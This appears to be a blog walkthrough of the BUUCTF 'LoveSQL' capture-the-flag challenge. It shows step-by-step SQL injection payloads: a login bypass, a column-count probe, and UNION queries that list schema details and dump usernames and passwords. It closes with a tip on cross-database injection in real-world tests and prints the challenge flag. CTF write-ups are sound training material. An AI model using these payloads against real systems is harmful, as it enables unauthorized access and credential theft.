buuctf_LoveSQL

0x01 题目链接

BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges

0x02 题目

打开靶场

登录框,直接使用万能钥匙 尝试登录

admn' or 1=1#

 放入flag里,发现不对,思路不对,换个思路

特别注意:不要使用slmap,因为。。。

回归正题:既让可以使用万能钥匙登录,那么就存在联合查询 

构造payload

' order by 4%23                //猜测字段数

分析:当4时报错,3不会,说明3就是临界值,因此为3个字段数【:这里用hackbar扩展工具,因此要把#换成%23】

接下来就是常规查询语句了

构造payload

' union select 1,database(),version()%23                //显示数据和数据库的版本

符合联合查询语句

构造payload

' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='geek'%23                //获取表名

 构造payload

' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23                //获取l0ve1ysq1这张表下的字段

 构造payload

' union select 1,group_concat(username),group_concat(password) from geek.l0ve1ysq1%23

Ctrl+U发现flag

flag{647ef451-c71c-4e75-9556-ec73cefc18de}

小彩蛋:

这里存在一个跨库注入,在这里没有起到任何作用,但实战测试中会有意想不到的效果

 如果当一个数据库中存在A,B两种不同的网站,假设A网站存在跨库注入漏洞,那么可以利用A网站的跨库注入,获取B网站的数据,甚至权限【前提是A网站有root权限】

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值